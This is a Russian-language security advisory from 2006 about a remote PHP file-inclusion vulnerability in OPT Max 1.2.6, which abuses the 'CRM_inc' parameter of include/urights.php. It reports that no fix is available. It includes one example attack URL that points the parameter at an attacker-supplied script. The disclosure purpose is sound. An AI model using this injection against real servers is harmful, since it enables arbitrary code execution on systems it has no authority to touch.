PHP-инклюдинг в OPT Max

Дата публикации:
21.08.2006
Всего просмотров:
1206
Опасность:
Высокая
Наличие исправления:
Нет
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Удаленная
Воздействие:
Компрометация системы
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Outreach Project Tool 1.x
Уязвимые версии: OPT Max 1.2.6, возможно другие версии.

Описание:
Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе.

Уязвимость существует из-за недостаточной обработки входных данных в параметре "CRM_inc" в сценарии include/urights.php. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера. Пример:

http://victim/[opt_path]/include/urights.php?CRM_inc=[evil_scripts.txt]

URL производителя: www.lanifex.com/business/business_en/products/815.html

Решение: Способов устранения уязвимости не существует в настоящее время.

Ссылки: OPT Max <= 1.2.0 (CRM_inc) Remote File Include Vulnerability

или введите имя

CAPTCHA